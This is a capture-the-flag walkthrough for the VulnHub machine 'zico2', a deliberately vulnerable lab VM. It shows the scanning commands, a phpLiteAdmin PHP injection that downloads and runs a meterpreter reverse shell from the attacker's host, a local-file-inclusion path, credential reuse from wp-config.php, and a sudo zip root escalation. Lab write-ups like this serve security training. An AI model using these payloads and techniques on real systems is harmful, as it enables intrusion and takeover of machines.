zico2: 1 Vulnhub — Walkthrough

LazysysAdmin Vulnhub — Walkthrough
April 14, 2019
Openssl Privilege Escalation(Read Any File)
April 18, 2019
Share This:

zico2: 1 Vulnhub — Walkthrough

Level: Intermediate

Goal: Get root and read the flag file

Description:

Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?

Hint: Enumerate, enumerate, and enumerate!

Thanks to: VulnHub

Lets Start With Nmap Scan

Nmap 7.70 scan initiated Sun Apr 14 21:48:17 2019 as: nmap -sC -sV -oA zico 192.168.1.4
Nmap scan report for 192.168.1.4
Host is up (0.00034s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Zico's Shop 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 43088/tcp status | 100024 1 51467/udp status
MAC Address: 08:00:27:A0:F9:63 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun Apr 14 21:48:24 2019 -- 1 IP address (1 host up) scanned in 7.24 seconds

Web Server Enumeration

Lets Check Tools

LFI

Gobuster

[email protected]:~/machines/zico# gobuster -u http://192.168.1.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain : http://192.168.1.4/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
2019/04/14 21:49:34 Starting gobuster
/img (Status: 301)
/index (Status: 200)
/tools (Status: 200)
/view (Status: 200)
/css (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/package (Status: 200)
/LICENSE (Status: 200)
/less (Status: 301)
/server-status (Status: 403)
/dbadmin (Status: 301)
2019/04/14 21:50:16 Finished
[email protected]:~/machines/zico#

PhpLiteAdmin

The dbadmin directory above seems to contain a phpLiteAdmin 1.9.3 installation which is vulnerable to Remote PHP Code Injection​ and is obviously left with default admin password:

Browsing it there was a table which contains 2 usernames + their passwords:

I googled the hashes and tried to login to SSH using the decrypted passwords, but unfortunately that did not work.

Now After Doing Searchsploit I got this https://www.exploit-db.com/exploits/24044/ We Need to exploit Now

EXPLOITING

So I figured what I would do is the following:

  1. Create reverse shell executable to point back to my kali
  2. Share the executable via a python http server
  3. Start up a meterpreter listener
  4. Create some PHP code to download the executable, make it executable, and execute it to open the reverse shell
  5. Profit?

Step 1, create the reverse shell executable.

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.79 LPORT=443 -f elf -o /tmp/rshell

Run the http server to host the file for download.

[email protected]:/tmp# python -m SimpleHTTPServer

Start meterpreter reverse TCP handler.

[email protected]:/tmp# systemctl start postgresql
[email protected]:/tmp# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.79
LHOST => 10.13.37.237
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > run
[*] Exploit running as background job 0.
 
[*] Started reverse TCP handler on 192.168.1.79:44

Create the aforementioned database/table in PHPLiteAdmin with the following default value:

<?php system("cd /tmp; wget 192.168.1.79:8000/rshell; chmod 777 rshell; ./rshell"); ?>

And then navigate to the following URL to run the PHP:

http://192.168.1.4/view.php?page=../../../../usr/databases/rshell.php

So now we Have shell So Lets Move On

cd /home
lets go check wordpress/wp-config.php
got creds from wp-config.php
Username - zico Password - sWfCsfJSPV9H3AmQzw8
Lets Login Via SSH
ssh [email protected]

Privilege Escalation

sudo -l

[email protected]:~$ sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip

We can do privesc via zip command

sudo zip .bash_logout.zip .bash_logout -T –unzip-command=”sh -c /bin/bash”

[email protected]:~$ sudo zip .bash_logout.zip .bash_logout -T --unzip-command="sh -c /bin/bash"
adding: .bash_logout (deflated 28%)
[email protected]:~# whoami
root
[email protected]:~#
[email protected]:/root# cat flag.txt 
#
#
#
ROOOOT!
You did it! Congratz!

Hope you enjoyed!


#
#
[email protected]:/root#

Happy Hacking…

Share This:

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: